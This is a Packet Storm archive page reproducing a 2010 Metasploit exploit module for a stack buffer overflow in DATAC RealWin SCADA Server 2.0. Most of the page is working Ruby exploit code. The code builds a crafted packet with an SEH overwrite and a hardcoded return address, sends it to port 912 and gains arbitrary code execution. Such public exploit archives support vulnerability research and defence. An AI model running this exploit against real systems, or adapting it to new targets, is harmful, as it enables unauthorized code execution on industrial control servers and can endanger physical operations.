what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow
Posted Oct 19, 2010
Authored by Luigi Auriemma, MC | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
SHA-256 | 6cf335d7a911baa5a781d9110c547c3f8feb4e5400dc4f0212b17723f78da7c3

DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow

Change Mirror Download
##
# $Id: realwin_scpc_initialize.rb 10734 2010-10-18 21:20:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server SCPC_SCPC_INITIALIZE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10734 $',
'References' =>
[
[ 'URL', 'http://aluigi.altervista.org/adv/realwin_1-adv.txt' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 550,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal', { 'Ret' => 0x4002da21 } ], # FlexMLang.DLL 8.1.45.19
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 15 2010'))

register_options([Opt::RPORT(912)], self.class)
end

def exploit

connect

data = [0x6a541264].pack('V')
data << [0x00000002].pack('V')
data << [0x00001ff4].pack('V')
data << "\xff\x7f"
data << rand_text_alpha_upper(226)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(10024 - payload.encoded.length)
data << "\x00"

print_status("Trying target #{target.name}...")
sock.put(data)

handler
disconnect

end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close